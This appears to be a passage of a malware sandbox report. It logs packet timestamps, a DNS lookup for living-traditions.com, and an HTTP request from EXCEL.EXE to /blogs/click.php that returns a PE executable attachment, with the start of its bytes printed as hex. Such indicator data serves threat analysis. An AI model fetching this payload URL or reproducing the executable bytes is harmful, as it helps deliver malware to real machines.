                            Apr 12, 2021 17:06:03.555491924 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.555569887 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.555583954 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.557766914 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680246115 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680319071 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680375099 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680432081 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680481911 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680489063 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680510044 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680516958 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680547953 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680555105 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680618048 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680649996 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680679083 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680702925 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680737972 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680790901 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680798054 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680798054 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680859089 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680883884 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680913925 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680969954 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.680979967 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.680988073 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681025982 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681051016 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681090117 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681149960 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681168079 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681176901 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681205988 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681227922 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681262970 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681318998 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681325912 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681338072 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681376934 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681416035 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681468010 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681507111 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681526899 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681561947 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681575060 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681586027 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681644917 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681700945 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681708097 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681719065 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681756973 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681811094 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681813955 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681821108 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681870937 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681896925 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.681936979 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681997061 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.681998968 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.682013035 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.682053089 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.682054043 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.682111025 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.682166100 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.682173014 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.682183027 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.682220936 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.682248116 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.682281017 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.682290077 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.682342052 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.682349920 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.683470964 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689080954 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689157009 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689205885 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689218044 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689280987 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689281940 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689286947 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689341068 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689372063 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689409971 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689431906 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689491034 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689521074 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689548016 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689608097 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689636946 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689665079 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689728022 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689728975 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689733982 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689790010 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689819098 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689847946 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689905882 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689910889 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689918995 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.689964056 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.689994097 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690021992 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690079927 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690082073 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690088034 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690136909 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690165043 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690201044 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690259933 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690260887 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690265894 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690315962 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690346003 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690373898 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690429926 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690433979 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690439939 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690485954 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690512896 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690542936 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690602064 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690604925 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690610886 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690666914 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690696001 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690726995 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690785885 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690787077 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690792084 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690844059 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690875053 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690901041 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690957069 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.690960884 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.690968990 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691015005 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691045046 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691073895 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691132069 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691137075 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691138983 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691199064 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691207886 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691257000 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691287041 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691315889 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691360950 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691374063 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691374063 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691431999 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691450119 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691497087 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691517115 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691555023 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691576004 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691606998 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691622972 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691684008 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691703081 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691741943 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691751003 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691800117 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691808939 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691881895 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691885948 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.691936970 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.691942930 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692003012 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692027092 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692058086 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692059040 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692121029 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692163944 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692179918 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692194939 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692238092 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692245960 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692287922 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692296028 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692352057 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692357063 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692409992 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692418098 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692466974 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692471981 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692522049 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692548990 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692550898 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692565918 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692580938 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692585945 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692606926 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692632914 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692652941 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692657948 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692660093 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692666054 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692683935 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692692995 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692711115 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692734957 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692734957 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692763090 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692775011 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692783117 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692789078 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692801952 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692815065 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692837954 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692840099 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692850113 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692864895 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692871094 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692892075 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692898035 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692918062 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692923069 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692944050 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692949057 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692971945 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.692995071 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.692996979 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.693022966 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.693032026 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.693038940 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.693048000 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.693062067 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.693073988 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.693098068 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.693109035 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.693120956 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.693133116 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.813178062 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813205957 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813220024 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813231945 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813244104 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813261986 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813277960 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813293934 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813311100 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813328028 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813340902 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813354015 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813366890 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813380003 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813436985 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813448906 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.813517094 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.813582897 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.817209005 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:08:02.416553974 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:08:02.547916889 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:08:02.548103094 CEST4916580192.168.2.2264.207.186.30

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 12, 2021 17:06:02.484072924 CEST5219753192.168.2.228.8.8.8
                            Apr 12, 2021 17:06:02.546745062 CEST53521978.8.8.8192.168.2.22

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Apr 12, 2021 17:06:02.484072924 CEST192.168.2.228.8.8.80xed69Standard query (0)living-traditions.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Apr 12, 2021 17:06:02.546745062 CEST8.8.8.8192.168.2.220xed69No error (0)living-traditions.com64.207.186.30A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • living-traditions.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.224916564.207.186.3080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            TimestampkBytes transferredDirectionData
                            Apr 12, 2021 17:06:02.699388027 CEST0OUTGET /blogs/click.php HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: living-traditions.com
                            Connection: Keep-Alive
                            Apr 12, 2021 17:06:02.888154984 CEST2INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Mon, 12 Apr 2021 15:06:02 GMT
                            Content-Type: application/octet-stream
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            X-Powered-By: PHP/7.3.25
                            Content-Disposition: attachment; filename="4HeVw.perclick"
                            X-Powered-By: PleskLin
                            Data Raw: 31 66 32 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 50 e9 4c 75 31 87 1f 75 31 87 1f 75 31 87 1f 3f 54 82 1e 74 31 87 1f 06 53 86 1e 72 31 87 1f 75 31 86 1f 70 31 87 1f 65 57 82 1e 71 31 87 1f 65 57 87 1e 74 31 87 1f 65 57 85 1e 74 31 87 1f 52 69 63 68 75 31 87 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 9a 2b 74 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 0d 00 28 00 00 00 b0 06 00 00 00 00 00 6d 19 00 00 00 10 00 00 00 40 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 07 00 00 04 00 00 28 0f 07 00 01 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 40 00 00 44 00 00 00 68 41 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 80 00 00 00 20 40 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 af 26 00 00 00 10 00 00 00 28 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 02 00 00 00 40 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 40 00 00 00 50 00 00 00 42 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 ff 67 06 00 00 a0 00 00 00 68 06 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 80 00 00 00 00 10 07 00 00 02 00 00 00 da 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 81 ec 28 02 00 00 53 56 be c3 68 13 00 33 db 43 83 3d 1c 90 00 10 00 89 5d d8 66 0f 6e c6 f3 0f
                            Data Ascii: 1f27MZ@!L!This program cannot be run in DOS mode.$1PLu1u1u1?Tt1Sr1u1p1eWq1eWt1eWt1Richu1PEL+t`!(m@ (@@@DhAP @@ .text&( `.rdataD@,@@.data8@PB0@.pdataghr@.reloc@BU(SVh3C=]fn
                            Apr 12, 2021 17:06:02.888185978 CEST3INData Raw: e6 c0 f2 0f 11 45 f0 89 75 f4 66 0f 6e c6 f3 0f e6 c0 f2 0f 11 45 f0 89 75 f4 66 0f 6e c6 f3 0f e6 c0 f2 0f 11 45 f0 66 0f 6e c6 f3 0f e6 c0 89 75 f4 f2 0f 11 45 f0 66 0f 6e c6 f3 0f e6 c0 89 75 f4 f2 0f 11 45 f0 66 0f 6e c6 f3 0f e6 c0 89 75 f4
                            Data Ascii: EufnEufnEfnuEfnuEfnuEfnuEut3fnhj5Eu4fnEufnjh05PEju0fn=EuP3fn
                            Apr 12, 2021 17:06:02.888209105 CEST4INData Raw: 8a 84 0d d8 fd ff ff 33 c2 88 84 0d d8 fd ff ff 41 c7 45 f4 c3 68 13 00 66 0f 6e 45 f4 f3 0f e6 c0 f2 0f 11 45 f0 c7 45 f4 c3 68 13 00 3b 0d 14 90 00 10 72 b1 ba c3 68 13 00 a1 14 90 00 10 fe c3 8b 4d 08 66 0f 6e c2 f3 0f e6 c0 89 5d d8 0f af c1
                            Data Ascii: 3AEhfnEEEh;rhMfn]EUfnEPEA3EUfnEUEEfnEU3E5UhEfnEfnUEEEfnUEfnU
